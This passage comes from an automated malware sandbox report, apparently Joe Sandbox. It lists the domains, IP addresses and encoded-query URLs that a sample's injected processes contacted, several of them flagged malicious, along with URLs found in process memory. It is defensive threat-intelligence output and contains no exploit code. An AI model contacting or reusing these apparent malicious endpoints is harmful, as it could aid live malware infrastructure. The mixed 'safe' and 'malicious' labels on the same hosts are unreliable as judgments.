                http://www.madhf.tech/3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBY0%Avira URL Cloudsafe
                http://www.yc791022.asia/31pt/0%Avira URL Cloudsafe
                http://www.jcsa.info/Business_Degrees.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR12xV0%Avira URL Cloudsafe
                http://www.rgenerousrs.store/8gp4/0%Avira URL Cloudsafe
                http://www.43kdd.top/p3j6/0%Avira URL Cloudsafe
                https://zkdamdjj.shop/swhs/?bV=8xf1FTtyUpYkrTYPPLWUAP0%Avira URL Cloudsafe
                http://www.zkdamdjj.shop/swhs/0%Avira URL Cloudsafe
                http://www.1secondlending.one/j8pv/0%Avira URL Cloudsafe
                http://www.register.com?trkID=WSTm3u15CW0%Avira URL Cloudsafe
                http://www.optimismbank.xyz/98j3/?bV=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbelSKgrKC4QuJZGFDN8wI4iJ7kAaJbEHf+I5C8wBrJZeg==&wzcP=iLdd0%Avira URL Cloudsafe
                http://www.xcvbj.asia/hkgx/0%Avira URL Cloudsafe
                http://www.laohub10.net/n2c9/?bV=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/MvpOFGl3CcQklZlekjGrp+0XQqfczBPHNrv5hMhkDFTE+A==&wzcP=iLdd0%Avira URL Cloudsafe
                http://www.thaor56.online/fev0/?wzcP=iLdd&bV=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKn/SU+87cwr0VJj825LSMeKmzjVPSaMyWz8le8KSNg+oL/g==0%Avira URL Cloudsafe
                https://www.register.com/whois.rcmx?domainName=Jcsa.info0%Avira URL Cloudsafe
                http://www.zkdamdjj.shop/swhs/?bV=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0tlUhCAXdO2W2lcbMXoQ37jkanwSyGhs5UT/ITwg7la8g==&wzcP=iLdd0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.bankseedz.info
                		46.30.211.38
                		truetrue
                  		unknown
                  www.optimismbank.xyz
                  		13.248.169.48
                  		truetrue
                    		unknown
                    www.madhf.tech
                    		103.224.182.242
                    		truefalse
                      		high
                      r0lqcud7.nbnnn.xyz
                      		202.79.161.151
                      		truefalse
                        		high
                        www.xcvbj.asia
                        		149.88.81.190
                        		truefalse
                          		high
                          bpgroup.site
                          		74.48.143.82
                          		truetrue
                            		unknown
                            43kdd.top
                            		38.47.232.202
                            		truetrue
                              		unknown
                              thaor56.online
                              		202.92.5.23
                              		truetrue
                                		unknown
                                www.1secondlending.one
                                		43.205.198.29
                                		truefalse
                                  		high
                                  www.zkdamdjj.shop
                                  		172.67.187.114
                                  		truefalse
                                    		high
                                    www.rgenerousrs.store
                                    		172.67.167.146
                                    		truefalse
                                      		high
                                      www.jcsa.info
                                      		208.91.197.39
                                      		truetrue
                                        		unknown
                                        www.yc791022.asia
                                        		101.35.209.183
                                        		truefalse
                                          		high
                                          www.greenthub.life
                                          		209.74.77.109
                                          		truetrue
                                            		unknown
                                            www.bpgroup.site
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.43kdd.top
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.laohub10.net
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  www.thaor56.online
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.bankseedz.info/uf7y/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.madhf.tech/3iym/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.jcsa.info/hxi5/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.rgenerousrs.store/8gp4/?bV=FEeZWlhMd48ysDs290a5kdk4wKu/Usks8a8x1+EEc0Vq+hoQB7y77HQo5oow9pdvGKqyyoz5OAo+pUm014OHEU2GNEJ4iSl/EJTCwnsfNhVKTNH/IB8Mre+zSk1Y9E9ALA==&wzcP=iLddtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.greenthub.life/r3zg/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.1secondlending.one/j8pv/?bV=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b7jwAWfgjYo1ceHXmQsmagjo2PVHkyEcMWf8OCye8gCuDoA==&wzcP=iLddtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.greenthub.life/r3zg/?bV=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT06b5FqqYL9BGdKsZ2rM8t/H5MOkDBuj8Escbc06JqN3wYtw==&wzcP=iLddtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.laohub10.net/n2c9/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.madhf.tech/3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZu44boXAwOrdyhUlC/OJ4E8YsdUb7oGGCmNRhxxg5yFhA==&wzcP=iLddtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.bankseedz.info/uf7y/?bV=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7gow9os+aP1J4EzwTxXBX+A+Fa6CXCkfj46dm/6YpVTzCxw==&wzcP=iLddtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.yc791022.asia/31pt/?bV=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0tkqytLQfQBhcOdFFeEx3iaXLjcxC54/kiaY/bAFrqB8g==&wzcP=iLddtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.optimismbank.xyz/98j3/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.jcsa.info/hxi5/?bV=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzECOhz/eBMNQtzbXvy0GcsSmUnEXx6wmc7on4m5IV1LddeYQ==&wzcP=iLddtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.43kdd.top/p3j6/?bV=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPKWG5WAS3psYmnqJIK+9TxAzVw33X+qLRjr2nQR0/ahQ8dw==&wzcP=iLddtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.43kdd.top/p3j6/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.rgenerousrs.store/8gp4/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.yc791022.asia/31pt/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.zkdamdjj.shop/swhs/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.optimismbank.xyz/98j3/?bV=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbelSKgrKC4QuJZGFDN8wI4iJ7kAaJbEHf+I5C8wBrJZeg==&wzcP=iLddtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.laohub10.net/n2c9/?bV=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/MvpOFGl3CcQklZlekjGrp+0XQqfczBPHNrv5hMhkDFTE+A==&wzcP=iLddtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.xcvbj.asia/hkgx/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.thaor56.online/fev0/?wzcP=iLdd&bV=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKn/SU+87cwr0VJj825LSMeKmzjVPSaMyWz8le8KSNg+oL/g==true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.1secondlending.one/j8pv/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.zkdamdjj.shop/swhs/?bV=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0tlUhCAXdO2W2lcbMXoQ37jkanwSyGhs5UT/ITwg7la8g==&wzcP=iLddtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://duckduckgo.com/chrome_newtabwaitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://dts.gnpge.comnfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/ac/?q=waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.jcsa.info/College_Information.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR1waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://i3.cdn-image.com/__media__/pics/28903/search.png)waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://cdn.consentmanager.netwaitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.rgenerousrs.storenfGtWoQBhJSQ.exe, 00000006.00000002.4471509831.0000000004A8A000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.jcsa.info/Education_Seminars.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR12waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.Jcsa.infowaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwaitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.jcsa.info/Education_Grant.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR12xVMwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.jcsa.info/University_of_Toronto.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHswaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://delivery.consentmanager.netwaitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.register.com/?trkID=WSTm3u15CWwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://i3.cdn-image.com/__media__/pics/29590/bg1.png)waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icowaitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.jcsa.info/display.cfmwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.jcsa.info/Business_Degrees.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR12xVwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.madhf.tech/3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYnfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000031AE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dfltwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.ecosia.org/newtab/waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://i3.cdn-image.com/__media__/pics/8934/rcomlogo.jpgwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://ac.ecosia.org/autocomplete?q=waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://zkdamdjj.shop/swhs/?bV=8xf1FTtyUpYkrTYPPLWUAPwaitfor.exe, 00000005.00000002.4470341771.000000000643A000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.0000000003B1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.register.com?trkID=WSTm3u15CWwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://www.register.com/whois.rcmx?domainName=Jcsa.infowaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://i3.cdn-image.com/__media__/js/min.js?v2.3waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high

                                                                                                                  World Map of Contacted IPs

                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs

                                                                                                                  Public IPs

                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  209.74.77.109
                                                                                                                  		www.greenthub.lifeUnited States
                                                                                                                  		31744MULTIBAND-NEWHOPEUStrue
                                                                                                                  13.248.169.48
                                                                                                                  		www.optimismbank.xyzUnited States
                                                                                                                  		16509AMAZON-02UStrue
                                                                                                                  172.67.187.114
                                                                                                                  		www.zkdamdjj.shopUnited States
                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                  103.224.182.242
                                                                                                                  		www.madhf.techAustralia
                                                                                                                  		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                                                                  208.91.197.39
                                                                                                                  		www.jcsa.infoVirgin Islands (BRITISH)
                                                                                                                  		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                  38.47.232.202
                                                                                                                  		43kdd.topUnited States
                                                                                                                  		174COGENT-174UStrue
                                                                                                                  202.92.5.23
                                                                                                                  		thaor56.onlineViet Nam
                                                                                                                  		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                                  101.35.209.183
                                                                                                                  		www.yc791022.asiaChina
                                                                                                                  		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                                                                  149.88.81.190
                                                                                                                  		www.xcvbj.asiaUnited States
                                                                                                                  		188SAIC-ASUSfalse
                                                                                                                  172.67.167.146
                                                                                                                  		www.rgenerousrs.storeUnited States
                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                  43.205.198.29
                                                                                                                  		www.1secondlending.oneJapan4249LILLY-ASUSfalse
                                                                                                                  46.30.211.38
                                                                                                                  		www.bankseedz.infoDenmark
                                                                                                                  		51468ONECOMDKtrue
                                                                                                                  202.79.161.151
                                                                                                                  		r0lqcud7.nbnnn.xyzSingapore
                                                                                                                  		64050BCPL-SGBGPNETGlobalASNSGfalse

                                                                                                                  General Information

                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1566688
                                                                                                                  Start date and time:2024-12-02 15:22:06 +01:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 9m 50s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Number of analysed new started processes analysed:7
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:2
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
